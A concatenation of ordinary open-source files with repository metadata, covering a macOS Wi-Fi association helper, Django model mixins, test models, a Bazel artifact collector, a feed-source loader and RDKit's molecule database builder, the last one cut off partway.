interface: the CWInterface to operate on.
Returns:
bool: whether setting the state was successful.
"""
if not interface:
interface = GetDefaultInterface()
if not interface:
return False
if bool(interface.powerOn()) != state:
_, error = interface.setPower_error_(state, None)
if error:
logging.debug('Failed to set interface power. Error: %s', error)
return False
if state:
while interface.interfaceState() == 0:
# After powering on the interface, it takes a while before it's ready.
logging.debug('Waiting for interface to wake up')
time.sleep(5)
return True
def Disassociate(interface=None):
"""Disassociate from the current network.
Args:
interface: the CWInterface to operate on.
"""
if not interface:
interface = GetDefaultInterface()
if not interface:
return
interface.disassociate()
def AssociateToNetwork(network, password=None, remember=False, interface=None):
"""Associate to a given CWNetwork.
Blocks until the association is complete.
Args:
network: the CWNetwork to connect to.
password: optional, a password to use for connecting.
remember: whether to remember the network.
interface: the CWInterface to operate on.
Returns:
bool: whether associating was successful or not.
"""
if not interface:
interface = GetDefaultInterface()
if not interface:
return False
SetInterfacePower(True, interface=interface)
_, error = interface.associateToNetwork_password_forceBSSID_remember_error_(
network, password, False, remember, None)
if error:
logging.debug('Failed to connect. Error: %s', error)
return False
# Wait until connection is actually established
while interface.ssid() != network.ssid():
time.sleep(5)
return True
def AssociateToSSID(ssid, password=None, remember=False, interface=None):
"""Associate to a given SSID.
Blocks until the association is complete.
If the first attempt to connect fails, a second attempt will be made before
returning as CoreWLAN often mysteriously fails on the first attempt.
Args:
ssid: the SSID of the network to connect to.
password: optional, a password to use for connecting.
remember: whether to remember the network.
interface: the CWInterface to operate on.
Returns:
bool: whether associating was successful or not.
"""
if not interface:
interface = GetDefaultInterface()
if not interface:
return False
SetInterfacePower(True, interface=interface)
networks = ScanForNetworks(ssid, interface=interface)
if not networks:
return False
network = networks[ssid]
return AssociateToNetwork(network, password=password,
interface=interface, remember=remember)
def ScanForNetworks(ssid, interface=None):
"""Scan for networks nearby.
Blocks until the association is complete.
The call to scanForNetworksWithName_error_ will return a list of networks
including many duplicates, so this function uses the rssiValue to pick
the CWNetwork object with the strongest signal for a given SSID. The RSSI
value goes from 0 to -100 with 0 being the best signal.
Args:
ssid: optional, an SSID to search for.
interface: the CWInterface to operate on.
Returns:
dict: CWNetwork objects keyed by the SSIDs.
"""
if not interface:
interface = GetDefaultInterface()
if not interface:
return None
SetInterfacePower(True, interface=interface)
nw = {}
networks, error = interface.scanForNetworksWithName_error_(ssid, None)
if not networks:
logging.debug('Failed to get networks. Error: %s', error)
return nw
for network in networks:
network_ssid = network.ssid()
if network_ssid not in nw:
nw[network_ssid] = network
else:
if network.rssiValue() > nw[network_ssid].rssiValue():
nw[network_ssid] = network
return nw
def _FindGuestNetwork(guest_networks, available_networks):
"""Returns the first guest network found in available networks.
Args:
guest_networks: list of string SSIDs used as guest networks.
available_networks: dict of networks to look through.
Returns:
SSID string of network found or None.
"""
for net in guest_networks:
if net in available_networks:
return net
def ConnectToNetwork(withcancelbutton):
"""Attempt to connect to a network.
If one of |GUEST_NETWORKS| is available nearby, will connect to that.
Otherwise, will offer a list of networks to connect to.
Args:
withcancelbutton: True to add a Cancel button to the Wi-Fi picker dialog.
Returns:
True if network connected, False if not or user canceled.
"""
logging.info('Searching for network to connect to, please wait')
networks = ScanForNetworks(None)
logging.info('Found these networks: %s', networks.keys())
guest_net = _FindGuestNetwork(GUEST_NETWORKS, networks)
if guest_net:
network = guest_net
else:
action = 'Refresh'
while action != 'OK':
dialog = cocoadialog.DropDown()
dialog.SetTitle('Select Wireless Network')
items = networks.keys()
items.sort()
dialog.SetItems(items)
dialog.SetButton1('OK')
dialog.SetButton2('Refresh')
if withcancelbutton:
dialog.SetButton3('Cancel')
action, network, _ = dialog.Show().split('\n')
if action == 'Refresh':
networks = ScanForNetworks(None)
elif action == 'Cancel':
return False
logging.info('Connecting to %s', network)
# Does network need a password?
password = None
if networks[network].securityMode():
if network in GUEST_NETWORKS:
for psk in GUEST_PSKS:
result = AssociateToNetwork(networks[network], password=psk)
logging.info('Attempted to connect to %s. Success: %s', network, result)
if result:
return True
logging.error('Password protected guest network detected, but known '
'passwords are not accepted.')
dialog = cocoadialog.Standard_InputBox()
dialog.SetPasswordBox()
dialog.SetTitle('Password Required')
dialog.SetInformativeText('The requested network (%s) requires a '
'password:' % network)
(_, password, _) = dialog.Show().split('\n')
result = AssociateToNetwork(networks[network], password=password)
logging.info('Attempted to connect to %s. Success: %s', network, result)
return result
| {
"content_hash": "d08b388d2a93ffeb8fbfa9476487ceeb",
"timestamp": "",
"source": "github",
"line_count": 309,
"max_line_length": 107,
"avg_line_length": 29.01294498381877,
"alnum_prop": 0.6982710540992749,
"repo_name": "netconstructor/macops",
"id": "eb834466a2e887bb8fedd48df4a3e95b45c3648e",
"size": "8965",
"binary": false,
"copies": "7",
"ref": "refs/heads/master",
"path": "gmacpyutil/gmacpyutil/airport.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "C++",
"bytes": "3500"
},
{
"name": "M",
"bytes": "816"
},
{
"name": "Makefile",
"bytes": "2128"
},
{
"name": "Objective-C",
"bytes": "87400"
},
{
"name": "Python",
"bytes": "400525"
},
{
"name": "Ruby",
"bytes": "2545"
},
{
"name": "Shell",
"bytes": "10252"
}
],
"symlink_target": ""
} |
from decimal import Decimal
from django.core.validators import MinValueValidator
from django.db import models
from django.utils.translation import ugettext_lazy as _
PRICE_MAX_DIGITS = 22
PRICE_DECIMAL_PLACES = 10
class UnitPriceMixin(models.Model):
"""
Mixin to expose standardized "unit_price" and "unit" field.
"""
class Meta:
abstract = True
class Units:
PER_MONTH = 'month'
PER_HALF_MONTH = 'half_month'
PER_DAY = 'day'
PER_HOUR = 'hour'
QUANTITY = 'quantity'
CHOICES = (
(PER_MONTH, _('Per month')),
(PER_HALF_MONTH, _('Per half month')),
(PER_DAY, _('Per day')),
(PER_HOUR, _('Per hour')),
(QUANTITY, _('Quantity')),
)
unit_price = models.DecimalField(
default=0,
max_digits=22,
decimal_places=7,
validators=[MinValueValidator(Decimal('0'))],
)
unit = models.CharField(default=Units.PER_DAY, max_length=30, choices=Units.CHOICES)
class ProductCodeMixin(models.Model):
class Meta:
abstract = True
# article code is used for encoding product category in accounting software
article_code = models.CharField(max_length=30, blank=True)
| {
"content_hash": "183a06c8df05924d2dcf017d872b114e",
"timestamp": "",
"source": "github",
"line_count": 49,
"max_line_length": 88,
"avg_line_length": 25.6734693877551,
"alnum_prop": 0.609697933227345,
"repo_name": "opennode/waldur-mastermind",
"id": "7aa1a668dedfded79020ab3646ab1a8c8c2343c2",
"size": "1258",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "src/waldur_mastermind/common/mixins.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "4429"
},
{
"name": "Dockerfile",
"bytes": "6258"
},
{
"name": "HTML",
"bytes": "42329"
},
{
"name": "JavaScript",
"bytes": "729"
},
{
"name": "Python",
"bytes": "5520019"
},
{
"name": "Shell",
"bytes": "15429"
}
],
"symlink_target": ""
} |
from django.db import models
from markitup.fields import MarkupField
class Post(models.Model):
title = models.CharField(max_length=50)
body = MarkupField('body of post')
def __unicode__(self):
return self.title
class NoRendered(models.Model):
"""
Test that the no_rendered_field keyword arg works. This arg should
never be used except by the South model-freezing.
"""
body = MarkupField(no_rendered_field=True)
| {
"content_hash": "fc20f8293f2c7353c1ce3e97ee8580c7",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 70,
"avg_line_length": 25.333333333333332,
"alnum_prop": 0.6973684210526315,
"repo_name": "sedden/pkg-python-django-markitup",
"id": "7a6a8cc98cdc5159783cafc62aeeb03f6d31c406",
"size": "456",
"binary": false,
"copies": "2",
"ref": "refs/heads/ubuntu-lucid",
"path": "tests/models.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
} |
"""Collecting build artifacts from a Build Events JSON file.
This script will collect test result artifacts from a provided Build Events
JSON file and copy them to a destination directory.
See https://docs.bazel.build/versions/master/build-event-protocol.html
Both source BEP file and destination dir are expected to be provided
as required --command-line-parameters.
"""
#
# Copyright 2018 Asylo authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import argparse
import json
import os
import shutil
import urllib.parse
import urllib.request
TEST_RESULTS = "Test Results"
TEST_LOG = "test.log"
TEST_XML = "test.xml"
def copy_test_results(artifacts, destination):
"""Copies Test Results to a destination.
During copy adjusts filenames to match test labels.
Args:
artifacts: Collected artifacts dictionary. TEST_RESULT key will contain
test result details keyed by a test label.
Lastly, each test detail is a dictionary containing TEST_LOG and TEST_XML
keys with list of files as value.
destination: Destination dir.
Returns:
A dictionary of new paths that was produced by the copy procedure
keyed by test labels.
"""
copied = {}
if TEST_RESULTS in artifacts:
for label, test_data in artifacts[TEST_RESULTS].items():
copied[label] = []
for file_name in [TEST_LOG, TEST_XML]:
if file_name in test_data:
# Test run attempt will be set to 0 for single test run
# or to 1 when a test re-runs.
attempt = 1 if len(test_data[file_name]) > 1 else 0
for artifact_file in test_data[file_name]:
try:
new_path = test_label_to_path(destination, label,
attempt, file_name)
os.makedirs(os.path.dirname(new_path), exist_ok=True)
shutil.copyfile(artifact_file, new_path)
copied[label].append(new_path)
except IOError as err:
# If we fail to collect a particular artifact,
# we don't want to fail the buildkite workflow because the failure
# is not related to the compilation, tests, or Docker setup.
# So we will log an error and ignore/continue.
print(err)
return copied
def discover(build_events_file):
"""Discovers all build artifacts from a Build Events file.
Args:
build_events_file: Path to BEP JSON file (must exist and be readable)
Returns:
Dictionary of artifacts keyed by build stage (e.g. test)
or an empty dictionary if build_events_file does not exist.
Raises:
RuntimeError: The build_events_file isn't readable.
"""
assert build_events_file is not None
if not os.path.exists(build_events_file):
print("File {} does not exist - nothing to do!".format(build_events_file))
return {}
artifacts = {}
if not os.access(build_events_file, os.R_OK):
raise RuntimeError("File {} isn't readable!".format(build_events_file))
with open(build_events_file, "r", encoding="utf-8") as f:
bep_data = f.read()
artifacts[TEST_RESULTS] = discover_test_results(bep_data)
return artifacts
def discover_test_results(bep_data, status=None):
"""Discovers test results from a Build Events file.
Args:
bep_data: BEP data in raw form (must be previously read from the BEP file).
status: array of desired test statuses to filter.
Returns:
Test results dictionary keyed by test names.
"""
assert bep_data is not None
test_results = {}
decoder = json.JSONDecoder()
# Note that BEP data is not a JSON object but rather a stream of
# build events, each a JSON object.
# See https://git.io/JeKjQ
pos = 0
while pos < len(bep_data):
bep_obj, size = decoder.raw_decode(bep_data[pos:])
if "testSummary" in bep_obj:
test_target = bep_obj["id"]["testSummary"]["label"]
test_status = bep_obj["testSummary"]["overallStatus"]
if status is None or test_status in status:
outputs = []
for s in ["passed", "failed"]:
if s in bep_obj["testSummary"]:
outputs.extend(bep_obj["testSummary"][s])
test_logs = []
for output in outputs:
test_logs.append(urllib.request.url2pathname(
urllib.parse.urlparse(output["uri"]).path))
test_results[test_target] = {
TEST_LOG: test_logs,
TEST_XML: [t.replace(TEST_LOG, TEST_XML) for t in test_logs],
"status": test_status
}
pos += size + 1
return test_results
def test_label_to_path(destination, label, attempt, file_name):
"""Converts a test label and test result file name to a path rooted in destination.
Args:
destination: Destination dir where test artifact will be copied
label: Test Label.
attempt: Run Attempt.
file_name: Original filename without a path (test.log or test.xml).
Returns:
New Path to be used for the file name.
"""
_, ext = os.path.splitext(file_name)
# remove leading //
path = label[2:]
path = path.replace("/", os.sep)
path = path.replace(":", os.sep)
if attempt == 0:
path = os.path.join(path, file_name)
else:
path = os.path.join(path, "attempt_{}{}".format(attempt, ext))
return os.path.join(destination, path)
def parse_arguments():
"""Parses command line arguments.
Returns:
Parsed arguments as an object.
"""
parser = argparse.ArgumentParser()
required = parser.add_argument_group("required arguments")
required.add_argument("--build-events", "-b", action="store", type=str,
help="Path to JSON Build Events File",
required=True)
required.add_argument("--destination", "-d", action="store", type=str,
help="Path to a destination directory for artifacts",
required=True)
return parser.parse_args()
def main():
args = parse_arguments()
artifacts = discover(args.build_events)
copied = copy_test_results(artifacts, args.destination)
n = sum(len(copied[item]) for item in copied)
print("{}: Collected {} artifacts for {} {}".format(
args.build_events, n, len(copied), TEST_RESULTS))
if __name__ == "__main__":
main()
| {
"content_hash": "ebc6d14611a5a30931865f305ee6ab68",
"timestamp": "",
"source": "github",
"line_count": 196,
"max_line_length": 85,
"avg_line_length": 34.19897959183673,
"alnum_prop": 0.6603013576010741,
"repo_name": "google/asylo",
"id": "1226447e596f703ea15615db4ac2dcf0944a8590",
"size": "6703",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "buildkite/collect_artifacts.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "120094"
},
{
"name": "C++",
"bytes": "5876707"
},
{
"name": "Dockerfile",
"bytes": "2666"
},
{
"name": "HTML",
"bytes": "2522"
},
{
"name": "Java",
"bytes": "23045"
},
{
"name": "Python",
"bytes": "46063"
},
{
"name": "Shell",
"bytes": "43678"
},
{
"name": "Smarty",
"bytes": "41243"
},
{
"name": "Starlark",
"bytes": "708214"
}
],
"symlink_target": ""
} |
from collections import defaultdict
import re
import sys
import time
sys.path.append('../..')
from crawler.crawler import crawl, itemFactory
from engine.data.database.databaseConnection import commit, rollback
from engine.data.database.sourceTable import addSource, sourceExists, urlToLookupId
from engine.data.database.sourceGroupAssignmentTable import addSourceGroupAssignment
#from engine.data.database.itemTable import getSourceUrlsForItemUrl
from engine.data.url import Url
def handleLine(line):
# Parse line
m = lineParser.match(line.rstrip())
assert(m.lastindex == 1 or m.lastindex == 2)
url = Url(m.group(1))
sourceGroupName = None
if(m.lastindex == 2):
sourceGroupName = m.group(2)
# Add source
if not sourceExists(url):
print("Adding " + url.value)
webFeed = itemFactory(url)
#if not hasSimilarSource(webFeed):
addSource(url, webFeed.name)
sourceId = urlToLookupId(url.value)
crawl(webFeed, sourceId)
print "https://ps4m.com/s/%d" % (sourceId)
#else:
# print "NOT ADDING!"
# return
else:
print (url.value + " already exists")
# If nessecary, assign source to group
if(sourceGroupName is not None):
print "\tAdding to %s" % (sourceGroupName)
sourceId = urlToLookupId(url.value)
addSourceGroupAssignment(sourceId, sourceGroupName)
return
def usage():
message = """%s
NAME
addListOfSources - adds a file of source urls
SYNOPSIS
addListOfSources SOURCE_FILE
SOURCE_FILE -
Contains one url per line. Also optionally, a space then a source group.
""" % sys.argv[0]
print message
lineParser = re.compile("^(\S+)\s?(.+)?$")
# XXX: Using this is taking too much time. Try using it again when we have an index
# in the database to make url lookup quicker.
def hasSimilarSource(webfeed):
duplicateUrlCounter = defaultdict(lambda:0)
for i in webfeed.items:
for sourceUrl in getSourceUrlsForItemUrl(i[1]):
duplicateUrlCounter[sourceUrl] += 1
# Print a warning, if any other webfeed has more than half of this webfeed
result = False
for c in duplicateUrlCounter.keys():
if (duplicateUrlCounter[c] > len(webfeed.items)/2):
print "Possible duplicate feed. New feed %s. Old feed: %s" % (webfeed.url, c)
result = True
return result
if(len(sys.argv) != 2):
usage()
exit(1)
sourceFilePath = sys.argv[1]
sourceFile = open(sourceFilePath, 'r')
problemLine = set()
for line in sourceFile:
try:
handleLine(line)
except Exception, e:
rollback()
print "fail %s: %s" % (line, e)
problemLine.add(line)
continue
print # Add a blank line between sources
commit()
time.sleep(1)
sourceFile.close()
# Report errors
if problemLine:
print 'Could Not Add the Following Line:'
for i in problemLine:
print i
| {
"content_hash": "a0fa3d23a400c1e594e2db7eb15a2939",
"timestamp": "",
"source": "github",
"line_count": 108,
"max_line_length": 89,
"avg_line_length": 27.435185185185187,
"alnum_prop": 0.6635167060411745,
"repo_name": "TobyRoseman/PS4M",
"id": "b56c67727479f76e91c529f10efa5d8a14aab7a2",
"size": "2963",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "admin/scripts/addListOfSources.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "2929"
},
{
"name": "JavaScript",
"bytes": "7712"
},
{
"name": "Mako",
"bytes": "6779"
},
{
"name": "Nginx",
"bytes": "1562"
},
{
"name": "Python",
"bytes": "53976"
},
{
"name": "Shell",
"bytes": "1566"
}
],
"symlink_target": ""
} |
_version = "0.13.0"
_description = """
NOTES:
- the property names for the database are the union of those for
all molecules.
- missing property values will be set to 'N/A', though this can be
changed with the --missingPropertyVal argument.
- The property names may be altered on loading the database. Any
non-alphanumeric character in a property name will be replaced
with '_'. e.g. "Gold.Goldscore.Constraint.Score" becomes
"Gold_Goldscore_Constraint_Score". This is important to know
when querying.
- Property names are not case sensitive in the database; this may
cause some problems if they are case sensitive in the sd file.
"""
import argparse
from rdkit import RDConfig
from rdkit import Chem
from rdkit.Dbase.DbConnection import DbConnect
from rdkit.Dbase import DbModule
from rdkit.RDLogger import logger
from rdkit.Chem.MolDb import Loader
logger = logger()
import sys, os
import io
import pickle
from rdkit.Chem.MolDb.FingerprintUtils import BuildSigFactory, LayeredOptions
from rdkit.Chem.MolDb import FingerprintUtils
# ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ----
def initParser():
""" Initialize the command line parser """
parser = argparse.ArgumentParser(usage='CreateDB [optional arguments] <filename>',
description=_description,
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('filename', nargs='?', help='File containg molecules to load into database')
parser.add_argument('--version', action='version', version='%(prog)s ' + _version)
parser.add_argument('--outDir', '--dbDir', default='', help='name of the output directory')
parser.add_argument('--molDbName', default='Compounds.sqlt', help='name of the molecule database')
parser.add_argument('--molIdName', default='compound_id', help='name of the database key column')
parser.add_argument('--regName', default='molecules', help='name of the molecular registry table')
parser.add_argument('--pairDbName', default='AtomPairs.sqlt', help='name of the atom pairs database')
parser.add_argument('--pairTableName', default='atompairs', help='name of the atom pairs table')
parser.add_argument('--fpDbName', default='Fingerprints.sqlt',
help='name of the 2D fingerprints database')
parser.add_argument('--fpTableName', default='rdkitfps', help='name of the 2D fingerprints table')
parser.add_argument('--layeredTableName', default='layeredfps',
help='name of the layered fingerprints table')
parser.add_argument('--descrDbName', default='Descriptors.sqlt',
help='name of the descriptor database')
parser.add_argument('--descrTableName', default='descriptors_v1', help='name of the descriptor table')
parser.add_argument('--descriptorCalcFilename', default=os.path.join(RDConfig.RDBaseDir, 'Projects',
'DbCLI', 'moe_like.dsc'),
help='name of the file containing the descriptor calculator')
parser.add_argument('--errFilename', default='loadErrors.txt',
help='name of the file to contain information about molecules that fail to load')
parser.add_argument('--noPairs', default=True, dest='doPairs', action='store_false',
help='skip calculating atom pairs')
parser.add_argument('--noFingerprints', default=True, dest='doFingerprints', action='store_false',
help='skip calculating 2D fingerprints')
parser.add_argument('--noLayeredFps', default=True, dest='doLayered', action='store_false',
help='skip calculating layered fingerprints')
parser.add_argument('--noDescriptors', default=True, dest='doDescriptors', action='store_false',
help='skip calculating descriptors')
parser.add_argument('--noProps', default=False, dest='skipProps', action='store_true',
help="don't include molecular properties in the database")
parser.add_argument('--noSmiles', default=False, dest='skipSmiles', action='store_true',
help="don't include SMILES in the database (can make loading somewhat faster)")
parser.add_argument('--maxRowsCached', default=-1,
help="maximum number of rows to cache before doing a database commit")
parser.add_argument('--silent', default=False, action='store_true',
help='do not provide status messages')
parser.add_argument('--molFormat', default='', choices=('smiles', 'sdf', ''),
help='specify the format of the input file')
parser.add_argument(
'--nameProp', default='_Name',
help='specify the SD property to be used for the molecule names. Default is to use the mol block name')
parser.add_argument(
'--missingPropertyVal', default='N/A',
help='value to insert in the database if a property value is missing. Default is %(default)s.')
parser.add_argument('--addProps', default=False, action='store_true',
help='add computed properties to the output')
parser.add_argument('--noExtras', default=False, action='store_true',
help='skip all non-molecule databases')
parser.add_argument('--skipLoad', '--skipMols', action="store_false", dest='loadMols', default=True,
help='skip the molecule loading (assumes mol db already exists)')
parser.add_argument('--updateDb', '--update', default=False, action='store_true',
help='add to an existing database')
parser.add_argument('--doPharm2D', default=False, action='store_true',
help='skip calculating Pharm2D fingerprints')
parser.add_argument('--pharm2DTableName', default='pharm2dfps',
help='name of the Pharm2D fingerprints table')
parser.add_argument('--fdefFile', '--fdef',
default=os.path.join(RDConfig.RDDataDir, 'Novartis1.fdef'),
help='provide the name of the fdef file to use for 2d pharmacophores')
parser.add_argument('--doGobbi2D', default=False, action='store_true',
help='skip calculating Gobbi 2D fingerprints')
parser.add_argument('--gobbi2DTableName', default='gobbi2dfps',
help='name of the Gobbi 2D fingerprints table')
parser.add_argument('--noMorganFps', '--noCircularFps', default=True, dest='doMorganFps',
action='store_false', help='skip calculating Morgan (circular) fingerprints')
parser.add_argument('--morganFpTableName', default='morganfps',
help='name of the Morgan fingerprints table')
parser.add_argument('--delimiter', '--delim', default=' ', help='the delimiter in the input file')
parser.add_argument('--titleLine', default=False, action='store_true',
help='the input file contains a title line')
parser.add_argument('--smilesColumn', '--smilesCol', default=0, type=int,
help='the column index with smiles')
parser.add_argument('--nameColumn', '--nameCol', default=1, type=int,
help='the column index with mol names')
return parser
def CreateDb(options, dataFilename='', supplier=None):
if not dataFilename and supplier is None:
raise ValueError('Please provide either a data filename or a supplier')
if options.errFilename:
errFile = open(os.path.join(options.outDir, options.errFilename), 'w+')
else:
errFile = None
if options.noExtras:
options.doPairs = False
options.doDescriptors = False
options.doFingerprints = False
options.doPharm2D = False
options.doGobbi2D = False
options.doLayered = False
options.doMorganFps = False
if options.loadMols:
if supplier is None:
if not options.molFormat:
ext = os.path.splitext(dataFilename)[-1].lower()
if ext == '.sdf':
options.molFormat = 'sdf'
elif ext in ('.smi', '.smiles', '.txt', '.csv'):
options.molFormat = 'smiles'
if not options.delimiter:
# guess the delimiter
import csv
sniffer = csv.Sniffer()
dlct = sniffer.sniff(open(dataFilename, 'r').read(2000))
options.delimiter = dlct.delimiter
if not options.silent:
logger.info(
'Guessing that delimiter is %s. Use --delimiter argument if this is wrong.' %
repr(options.delimiter))
if not options.silent:
logger.info('Guessing that mol format is %s. Use --molFormat argument if this is wrong.' %
repr(options.molFormat))
if options.molFormat == 'smiles':
if options.delimiter == '\\t':
options.delimiter = '\t'
supplier = Chem.SmilesMolSupplier(
dataFilename, titleLine=options.titleLine, delimiter=options.delimiter,
smilesColumn=options.smilesColumn, nameColumn=options.nameColumn)
else:
supplier = Chem.SDMolSupplier(dataFilename)
if not options.silent:
logger.info('Reading molecules and constructing molecular database.')
Loader.LoadDb(supplier, os.path.join(options.outDir, options.molDbName), errorsTo=errFile,
regName=options.regName, nameCol=options.molIdName, skipProps=options.skipProps,
defaultVal=options.missingPropertyVal, addComputedProps=options.addProps,
uniqNames=True, skipSmiles=options.skipSmiles,
maxRowsCached=int(options.maxRowsCached), silent=options.silent,
nameProp=options.nameProp, lazySupplier=int(options.maxRowsCached) > 0,
startAnew=not options.updateDb)
if options.doPairs:
pairConn = DbConnect(os.path.join(options.outDir, options.pairDbName))
pairCurs = pairConn.GetCursor()
try:
pairCurs.execute('drop table %s' % (options.pairTableName))
except Exception:
pass
pairCurs.execute(
'create table %s (guid integer not null primary key,%s varchar not null unique,atompairfp blob,torsionfp blob)'
% (options.pairTableName, options.molIdName))
if options.doFingerprints or options.doPharm2D or options.doGobbi2D or options.doLayered:
fpConn = DbConnect(os.path.join(options.outDir, options.fpDbName))
fpCurs = fpConn.GetCursor()
try:
fpCurs.execute('drop table %s' % (options.fpTableName))
except Exception:
pass
try:
fpCurs.execute('drop table %s' % (options.pharm2DTableName))
except Exception:
pass
try:
fpCurs.execute('drop table %s' % (options.gobbi2DTableName))
except Exception:
pass
try:
fpCurs.execute('drop table %s' % (options.layeredTableName))
except Exception:
pass
if options.doFingerprints:
fpCurs.execute(
'create table %s (guid integer not null primary key,%s varchar not null unique,rdkfp blob)'
% (options.fpTableName, options.molIdName))
if options.doLayered:
layeredQs = ','.join('?' * LayeredOptions.nWords)
colDefs = ','.join(['Col_%d integer' % (x + 1) for x in range(LayeredOptions.nWords)])
fpCurs.execute(
'create table %s (guid integer not null primary key,%s varchar not null unique,%s)' % (
options.layeredTableName, options.molIdName, colDefs))
if options.doPharm2D:
fpCurs.execute(
'create table %s (guid integer not null primary key,%s varchar not null unique,pharm2dfp blob)'
% (options.pharm2DTableName, options.molIdName))
sigFactory = BuildSigFactory(options)
if options.doGobbi2D:
fpCurs.execute(
'create table %s (guid integer not null primary key,%s varchar not null unique,gobbi2dfp blob)'
% (options.gobbi2DTableName, options.molIdName))
from rdkit.Chem.Pharm2D import Generate, Gobbi_Pharm2D
if options.doMorganFps:
fpConn = DbConnect(os.path.join(options.outDir, options.fpDbName))
fpCurs = fpConn.GetCursor()
try:
fpCurs.execute('drop table %s' % (options.morganFpTableName))
except Exception:
pass
fpCurs.execute(
'create table %s (guid integer not null primary key,%s varchar not null unique,morganfp blob)'
% (options.morganFpTableName, options.molIdName))
if options.doDescriptors:
descrConn = DbConnect(os.path.join(options.outDir, options.descrDbName))
with open(options.descriptorCalcFilename, 'r') as inTF:
buf = inTF.read().replace('\r\n', '\n').encode('utf-8')
inTF.close()
calc = pickle.load(io.BytesIO(buf))
nms = [x for x in calc.GetDescriptorNames()]
descrCurs = descrConn.GetCursor()
descrs = ['guid integer not null primary key', '%s varchar not null unique' % options.molIdName]
descrs.extend(['%s float' % x for x in nms])
try:
descrCurs.execute('drop table %s' % (options.descrTableName))
except Exception:
pass
descrCurs.execute('create table %s (%s)' % (options.descrTableName, ','.join(descrs)))
descrQuery = ','.join([DbModule.placeHolder] * len(descrs))
pairRows = []
fpRows = []
layeredRows = []
descrRows = []
pharm2DRows = []
gobbi2DRows = []
morganRows = []
if not options.silent:
logger.info('Generating fingerprints and descriptors:')
molConn = DbConnect(os.path.join(options.outDir, options.molDbName))
molCurs = molConn.GetCursor()
if not options.skipSmiles:
molCurs.execute('select guid,%s,smiles,molpkl from %s' % (options.molIdName, options.regName))
else:
molCurs.execute('select guid,%s,molpkl from %s' % (options.molIdName, options.regName))
i = 0
while 1:
try:
tpl = molCurs.fetchone()
molGuid = tpl[0]
molId = tpl[1]
pkl = tpl[-1]
i += 1
except Exception:
break
if isinstance(pkl, (bytes, str)):
mol = Chem.Mol(pkl)
else:
mol = Chem.Mol(str(pkl))
if not mol:
continue
if options.doPairs:
pairs = FingerprintUtils.BuildAtomPairFP(mol)
torsions = FingerprintUtils.BuildTorsionsFP(mol)
pkl1 = DbModule.binaryHolder(pairs.ToBinary())
pkl2 = DbModule.binaryHolder(torsions.ToBinary())
row = (molGuid, molId, pkl1, pkl2)
pairRows.append(row)
if options.doFingerprints:
fp2 = FingerprintUtils.BuildRDKitFP(mol)
pkl = DbModule.binaryHolder(fp2.ToBinary())
row = (molGuid, molId, pkl)
fpRows.append(row)
if options.doLayered:
words = LayeredOptions.GetWords(mol)
row = [molGuid, molId] + words
layeredRows.append(row)
if options.doDescriptors:
descrs = calc.CalcDescriptors(mol)
row = [molGuid, molId]
row.extend(descrs)
descrRows.append(row)
if options.doPharm2D:
FingerprintUtils.sigFactory = sigFactory
fp = FingerprintUtils.BuildPharm2DFP(mol)
pkl = DbModule.binaryHolder(fp.ToBinary())
row = (molGuid, molId, pkl)
pharm2DRows.append(row)
if options.doGobbi2D:
FingerprintUtils.sigFactory = Gobbi_Pharm2D.factory
fp = FingerprintUtils.BuildPharm2DFP(mol)
pkl = DbModule.binaryHolder(fp.ToBinary())
row = (molGuid, molId, pkl)
gobbi2DRows.append(row)
if options.doMorganFps:
morgan = FingerprintUtils.BuildMorganFP(mol)
pkl = DbModule.binaryHolder(morgan.ToBinary())
row = (molGuid, molId, pkl)
morganRows.append(row)
if not i % 500:
if len(pairRows):
pairCurs.executemany('insert into %s values (?,?,?,?)' % options.pairTableName, pairRows)
pairRows = []
pairConn.Commit()
if len(fpRows):
fpCurs.executemany('insert into %s values (?,?,?)' % options.fpTableName, fpRows)
fpRows = []
fpConn.Commit()
if len(layeredRows):
fpCurs.executemany('insert into %s values (?,?,%s)' % (options.layeredTableName, layeredQs),
layeredRows)
layeredRows = []
fpConn.Commit()
if len(descrRows):
descrCurs.executemany('insert into %s values (%s)' % (options.descrTableName, descrQuery),
descrRows)
descrRows = []
descrConn.Commit()
if len(pharm2DRows):
fpCurs.executemany('insert into %s values (?,?,?)' % options.pharm2DTableName, pharm2DRows)
pharm2DRows = []
fpConn.Commit()
if len(gobbi2DRows):
fpCurs.executemany('insert into %s values (?,?,?)' % options.gobbi2DTableName, gobbi2DRows)
gobbi2DRows = []
fpConn.Commit()
if len(morganRows):
fpCurs.executemany('insert into %s values (?,?,?)' % options.morganFpTableName, morganRows)
morganRows = []
fpConn.Commit()
if not options.silent and not i % 500:
logger.info(' Done: %d' % (i))
if len(pairRows):
pairCurs.executemany('insert into %s values (?,?,?,?)' % options.pairTableName, pairRows)
pairRows = []
pairConn.Commit()
if len(fpRows):
fpCurs.executemany('insert into %s values (?,?,?)' % options.fpTableName, fpRows)
fpRows = []
fpConn.Commit()
if len(layeredRows):
fpCurs.executemany('insert into %s values (?,?,%s)' % (options.layeredTableName, layeredQs),
layeredRows)
layeredRows = []
fpConn.Commit()
if len(descrRows):
descrCurs.executemany('insert into %s values (%s)' % (options.descrTableName, descrQuery),
descrRows)
descrRows = []
descrConn.Commit()
if len(pharm2DRows):
fpCurs.executemany('insert into %s values (?,?,?)' % options.pharm2DTableName, pharm2DRows)
pharm2DRows = []
fpConn.Commit()
if len(gobbi2DRows):
fpCurs.executemany('insert into %s values (?,?,?)' % options.gobbi2DTableName, gobbi2DRows)
gobbi2DRows = []
